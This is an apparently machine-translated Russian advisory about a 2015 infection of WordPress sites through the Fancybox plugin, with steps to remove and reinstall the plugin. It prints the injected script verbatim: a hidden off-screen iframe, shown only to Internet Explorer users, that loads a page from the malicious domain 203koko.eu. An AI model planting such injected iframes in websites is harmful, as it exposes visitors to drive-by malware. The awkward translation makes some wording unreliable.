В начале недели серия сайтов и блогов с WordPress, получил предупреждения о вредоносная инфекция через Google WebmastersПолем
Проблема, в которой Google Webmasters относится к присутствию треска / сценарий iframe вредоносное ПО В источнике веб -страниц.
<script>if (navigator.userAgent.match(/msie/i)) { document.write(' <div style="position:absolute;left:-2000px;width:2000px"><iframe src="http://203koko.eu/hjnfh/ipframe2.php" width="20" height="30" ></iframe></div>'); }</script>Кажется уязвимость а плагинприобретенныйFancybox для WordPress который до вчерашнего дня (05.02.2015) давно не обновлялся.
Решение этой проблемы и Дезинфекция вирусных сайтов С этим вредоносным ПО, это относительно просто.
1. Отключить плагинку Fancybox.
2. Удалить все файлы плагинов Fancybox на сервере (через FTP)
3. Установите новую версию плагина (Fancybox 3.0.4)
Fancybox для WordPress 3.0.4
– Переименованные в настройке, затронутые вопросом безопасности, упомянутой в 3.0.3. Это должно помешать злонамеренному коду появиться на сайтах, где плагин обновляется без удаления вредоносного кода.
Fancybox для WordPress 3.0.3
– Исправлена проблема безопасностиПолем
Информация о вредоносных программах:
Тип: перенаправление iframe
Цель: WordPress Fancybox
Домен вредоносного ПО: 203koko.eu
УРУБОВАНИЕ УРИ: http://203koko.eu/hjnfh/ipframe2.php
Вредоносная необработанная код: <iframe src =”http://203koko.eu/hjnfh/ipframe2.php” ширина =”20″ высота =”30″ ></iframe>
Сценарий вредоносного ПО: <сценарий>if (navigator.useragent.match (/msie/i)) {document.write (‘ <Div Style =”Положение: абсолют; слева: -2000px; ширина: 2000px”>
Удалить вредоносное ПО на вашем веб -сайте WordPressПолем
